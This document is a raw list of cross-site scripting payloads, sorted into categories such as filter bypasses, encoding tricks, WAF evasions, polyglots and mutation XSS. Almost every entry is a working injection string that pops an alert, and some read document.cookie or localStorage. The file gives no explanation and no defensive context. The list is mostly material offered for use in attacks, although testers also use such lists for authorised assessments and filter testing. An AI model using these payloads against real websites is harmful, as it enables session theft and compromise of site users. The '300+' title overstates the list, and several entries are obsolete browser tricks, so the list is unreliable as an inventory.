# XSS Payloads Collection - 300+ Payloads
# ==============================================

# Basic XSS
<script>alert('XSS')</script>
'><script>alert('XSS')</script>
"><script>alert('XSS')</script>
javascript:alert('XSS')
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
<iframe src="javascript:alert('XSS')"></iframe>
<body onload=alert('XSS')>
<input onfocus=alert('XSS') autofocus>
<select onfocus=alert('XSS') autofocus><option>test</option></select>

# Event Handlers
<div onclick=alert('XSS')>Click</div>
<button onmouseover=alert('XSS')>Hover</button>
<form onsubmit=alert('XSS')><input type=submit></form>
<textarea onkeypress=alert('XSS')></textarea>
<input onchange=alert('XSS')>
<select onblur=alert('XSS')></select>
<details ontoggle=alert('XSS')></details>
<audio onloadstart=alert('XSS')></audio>
<video oncanplay=alert('XSS')></video>
<marquee onstart=alert('XSS')>text</marquee>

# Filter Bypasses
<ScRiPt>alert('XSS')</ScRiPt>
<SCRIPT>alert('XSS')</SCRIPT>
<%73%63%72%69%70%74>alert('XSS')</%73%63%72%69%70%74>
<script >alert('XSS')</script>
<script	>alert('XSS')</script>
<script
>alert('XSS')</script>
<script
>alert('XSS')</script>
<script/**/>alert('XSS')</script>
<script>/**/alert('XSS')</script>
<script>alert(/**/String.fromCharCode(88,83,83))</script>

# Encoding Bypasses
&lt;script&gt;alert('XSS')&lt;/script&gt;
%3Cscript%3Ealert('XSS')%3C/script%3E
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3C%2F%73%63%72%69%70%74%3E
\u003cscript\u003ealert('XSS')\u003c/script\u003e
\x3cscript\x3ealert('XSS')\x3c/script\x3e

# DOM Based
<img src=1 onerror=alert(document.domain)>
<img src=1 onerror=alert(document.cookie)>
<img src=1 onerror=alert(localStorage)>
<img src=1 onerror=alert(sessionStorage)>
<img src=1 onerror=alert(location.href)>

# Template Injection
{{alert('XSS')}}
${alert('XSS')}
#{alert('XSS')}
<%=alert('XSS')%>
{alert('XSS')}
[alert('XSS')]

# Protocol Based
javascript:alert('XSS')
data:text/html,<script>alert('XSS')</script>
vbscript:msgbox('XSS')
livescript:alert('XSS')
mocha:alert('XSS')
charset:alert('XSS')

# Image Based
<img src=x onload=alert('XSS')>
<img src=x onabort=alert('XSS')>
<img src=x onerror=alert('XSS')>
<img src="javascript:alert('XSS')">
<img dynsrc="javascript:alert('XSS')">
<img lowsrc="javascript:alert('XSS')">

# SVG Based
<svg><script>alert('XSS')</script></svg>
<svg onload=alert('XSS')></svg>
<svg><image xlink:href="javascript:alert('XSS')"></svg>
<svg><animate onbegin=alert('XSS')></svg>
<svg><animateTransform onbegin=alert('XSS')></svg>

# HTML5 Specific
<audio src=x onerror=alert('XSS')>
<video src=x onerror=alert('XSS')>
<source src=x onerror=alert('XSS')>
<track src=x onerror=alert('XSS')>
<canvas width=100 height=100 onerror=alert('XSS')></canvas>

# CSS Injection
<style>@import'javascript:alert("XSS")';</style>
<style>body{background:url(javascript:alert('XSS'));}</style>
<style>*{background-image:url(javascript:alert('XSS'));}</style>

# Meta Tag Injection
<meta http-equiv="refresh" content="0;url=javascript:alert('XSS')">
<meta charset="x-mac-cyrillic"><script>alert('XSS')</script>

# Link Tag Injection
<link rel="stylesheet" href="javascript:alert('XSS')">
<link rel="import" href="javascript:alert('XSS')">

# Base Tag Injection
<base href="javascript://alert('XSS')//">

# Form Based
<form action="javascript:alert('XSS')"><input type=submit></form>
<formaction="javascript:alert('XSS')">

# Iframe Variations
<iframe src="javascript:alert('XSS')"></iframe>
<iframe srcdoc="<script>alert('XSS')</script>"></iframe>
<iframe src=data:text/html,<script>alert('XSS')</script>></iframe>

# Object/Embed
<object data="javascript:alert('XSS')"></object>
<embed src="javascript:alert('XSS')"></embed>

# Math ML
<math><mi xlink:href="javascript:alert('XSS')">test</mi></math>

# Advanced Filter Bypasses
<img src=1 onerror=eval(atob('YWxlcnQoJ1hTUycpOw=='))>
<img src=1 onerror=window[atob('YWxlcnQ=')]('XSS')>
<img src=1 onerror=Function('alert("XSS")')()>
<img src=1 onerror=setTimeout('alert("XSS")',1)>
<img src=1 onerror=setInterval('alert("XSS")',1000)>

# Context Specific
';alert('XSS');//
";alert('XSS');//
');alert('XSS');//
");alert('XSS');//
</script><script>alert('XSS')</script>
</title><script>alert('XSS')</script>
</textarea><script>alert('XSS')</script>
</option></select><script>alert('XSS')</script>

# WAF Bypasses
<script>alert(String.fromCharCode(88,83,83))</script>
<img src=1 onerror=alert(/XSS/)>
<img src=1 onerror=alert`XSS`>
<svg onload=alert(/XSS/)>
<iframe src=jaVaScRiPt:alert('XSS')></iframe>

# Character Encoding
<script>\u0061\u006C\u0065\u0072\u0074('XSS')</script>
<script>\141\154\145\162\164('XSS')</script>
<script>alert\x28'XSS'\x29</script>

# Expression Based
<div style="width:expression(alert('XSS'))"></div>
<img style="xss:expression(alert('XSS'))">

# Polyglot Payloads
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'
"><img src=x onerror=alert('XSS')><"
'><img src=x onerror=alert('XSS')><'

# Creative Bypasses
<img src=\\ onerror=alert('XSS')>
<img src=// onerror=alert('XSS')>
<script>eval('ale'+'rt("XSS")')</script>
<script>Function('ale'+'rt("XSS")')();</script>
<img src=1 onerror=alert(String.fromCharCode(88)+String.fromCharCode(83)+String.fromCharCode(83))>

# Mutation XSS
<listing><img src=1 onerror=alert('XSS')></listing>
<xmp><img src=1 onerror=alert('XSS')></xmp>

# Browser Specific
<img src=1 onerror=alert('XSS') onload=alert('XSS')>
<!--[if IE]><script>alert('XSS')</script><![endif]-->
<?xml version="1.0"?><script>alert('XSS')</script>

# HTML5 Vectors
<keygen onfocus=alert('XSS') autofocus>
<datalist><option value=alert('XSS')></datalist>
<menuitem icon=javascript:alert('XSS') type=checkbox>

# Additional Polyglots
1';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";\nalert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//
